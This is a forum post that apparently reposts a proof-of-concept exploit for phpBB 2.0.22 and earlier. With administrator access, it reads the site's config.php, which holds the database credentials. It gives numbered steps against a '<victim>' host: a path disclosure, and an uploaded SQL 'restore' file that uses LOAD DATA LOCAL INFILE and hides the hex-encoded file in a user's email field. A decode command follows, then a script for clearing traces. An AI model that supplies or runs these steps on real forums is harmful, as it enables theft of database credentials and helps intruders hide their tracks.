Jump to content
Kekkei

phpBB <= 2.0.22 Remote Database Authentication Details PO

By Kekkei, in Exploituri

Recommended Posts

Kekkei Newbie

Kekkei

Posted
Posted

## phpBB <= 2.0.22 Remote Database Authentication Details POC

##

## This text will show you how to get the content of the file

## config.php with the 'LOCAL INFILE' SQL command. You can also

## do it with 'LOAD_FILE' but you'll need file privileges, that's

## not interesting. To do it, you'll need Administrator rights

## (we'll use admin_db_utilities.php) and local_infile=ON

## (you don't need file privileges, that's why it's quite cool).

## PHP scripts should not permit the user to execute SQL commands.

##

## 1 Go to http://<victim>/login.php?redirect=admin/index.php&admin=1

## 2 Log in as Administrator

##

## 3 Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>

## 4 You'll get a full path disclosure, note it somewhere

##

## 5 Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>

## 6 Choose "Structure-Only backup" then click on "Start Backup"

## 7 Now open the file and search the table prefix, note it

##

## 8 Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>

## 9 Create a file which have this content [replace <phpbb_fullpath>,<user>,<prefix>]:

## /*----------------------------------------------------------------------*/

## CREATE TABLE tmp_hack(content text, email text, viewemail text);

## LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS

## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';

## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE

## username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');

## UPDATE <prefix>users SET user_viewemail=0, user_email=

## CONCAT('">

<span class="gen">Encoded content</span>

<input',

## UNHEX(20),'type="text" value="',

## (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')

## WHERE username='<user>';

## /*----------------------------------------------------------------------*/

## 10 Choose the file then click on "Start Restore"

##

## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content

## 12 This is the encoded content of the file config.php, use the pack() function to decode it

## 13 For example, with php, type this in your shell: php -r print(pack('H*','<encoded_file>'));

## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)

##

## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:

## /*----------------------------------------------------------------------*/

## UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),

## user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';

## DROP TABLE tmp_hack;

## /*----------------------------------------------------------------------*/

##

## by DarkFig <gmdarkfig (at) gmail (dot) com>

## http://acid-root.new.fr/

## #acidroot@irc.worldnet.net

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...